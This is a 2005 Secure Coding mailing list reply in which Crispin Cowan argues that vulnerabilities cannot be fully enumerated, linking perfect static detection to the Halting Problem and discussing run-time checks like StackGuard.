Secure Coding mailing list archives

Re: Theoretical question about vulnerabilities


From: Crispin Cowan <crispin () immunix com>
Date: Mon, 11 Apr 2005 03:20:50 +0100


Pascal Meunier wrote:


Do you think it is possible to enumerate all the ways all vulnerabilities
can be created?  Is the set of all possible exploitable programming mistakes
bounded?
 


Yes and no.

Yes, if your enumeration is "1" and that is the set of all errors that 
allow an attacker to induce unexpected behavior from the program.


No is the serious answer: I do not believe it is possible to enumerate 
all of the ways to make a programming error. Sure, it is possible to 
enumerate all of the *commonly observed* errors that cause wide-spread 
problems. But enumerating all possible errors is impossible, because you 
cannot enumerate all programs.



I would think that what makes it possible to talk about design patterns and
attack patterns is that they reflect intentional actions towards "desirable"
(for the perpetrator) goals, and the set of desirable goals is bounded at
any given time (assuming infinite time then perhaps it is not bounded).
 


Nope, sorry, I disbelieve that the set of attacker goals is bounded.


However, once commonly repeated mistakes have been described and taken into
account, I have a feeling that attempting to enumerate all other possible
mistakes (leading to exploitable vulnerabilities), for example with the goal
of producing a complete taxonomy, classification and theory of
vulnerabilities, is not possible.

I agree that it is not possible. Consider that some time in the next 
decade, a new form of programming or technology will appear. It will 
introduce a new kind of pathology. We know that this will happen because 
it has already happened: Web forums that allow end-user content to be 
posted resulted in the phenomena of Cross Site Scripting.



 All we can hope is to come reasonably
close and produce something useful, but not theoretically strong and closed.
 

Security is very simple. Only use perfect software :) For those who can 
afford it, perfect software is great. The rest of us will be fighting 
with insecure software forever.



This should have consequences for source code vulnerability analysis
software.  It should make it impossible to write software that detects all
of the mistakes themselves.

The impossibility of a perfect source code vulnerability detector is a 
corollary of Alan Turing's original Halting Problem.



 Is it enough to look for violations of some
invariants (rules) without knowing how they happened?
 

Looking for run-time invariant violations is a basic way of getting 
around static undecidability induced by Turing's theorem. Switching from 
static to dynamic analysis comes with a host of strengths and 
weaknesses. For instance, StackGuard (which is really just a run-time 
enforcement of a single invariant) can detect buffer overflow 
vulnerabilities that static analyzers cannot detect. However, StackGuard 
cannot detect such vulnerabilities until some attacker helpfully comes 
along and tries to exploit such a vulnerability.



Any thoughts on this?  Any references to relevant theories of failures and
errors, or to explorations of this or similar ideas, would be welcome.  Of
course, Albert Einstein's quote on the difference between genius and
stupidity comes to mind :).
 

"Reliable software does what it is supposed to do. Secure software does 
what it is supposed to do and nothing else." -- Ivan Arce


"Security is very simple. Only use perfect software :) For those who can 
afford it, perfect software is great. The rest of us will be fighting 
with insecure software forever." -- me :)


Crispin

--
Crispin Cowan, Ph.D.  http://immunix.com/~crispin/
CTO, Immunix          http://immunix.com






Current thread: